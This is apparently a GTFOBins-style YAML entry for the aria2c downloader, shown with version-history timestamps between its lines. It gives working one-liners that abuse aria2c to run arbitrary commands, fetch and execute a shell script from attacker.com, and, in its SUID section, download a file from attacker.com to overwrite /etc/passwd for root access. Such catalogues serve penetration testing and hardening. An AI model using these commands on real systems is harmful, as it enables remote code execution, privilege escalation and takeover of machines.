2018-09-07 09:53:15 +00:00
---
2018-09-07 11:30:55 +00:00
description: Note that the subprocess is immediately sent to the background.
2018-09-07 09:53:15 +00:00
functions:
2018-10-05 17:55:38 +00:00
command:
2018-09-07 11:30:55 +00:00
- code: |
COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
aria2c --on-download-error=$TF http://x
2018-09-07 11:46:22 +00:00
- description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
2018-09-07 11:30:55 +00:00
code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
2021-01-11 11:45:21 +00:00
sudo:
2018-09-07 11:30:55 +00:00
- code: |
COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
2021-01-11 11:45:21 +00:00
sudo aria2c --on-download-error=$TF http://x
2023-01-02 08:36:59 +00:00
suid:
- code: |
aria2c -d /etc/ -o passwd "http://attacker.com/passwd" --allow-overwrite=true
- description: Remote download and replace /etc/passwd with root privilege.
2021-01-11 11:45:21 +00:00
limited-suid:
2018-09-07 11:30:55 +00:00
- code: |
COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
2021-01-11 11:45:21 +00:00
./aria2c --on-download-error=$TF http://x
2018-09-07 09:53:15 +00:00
---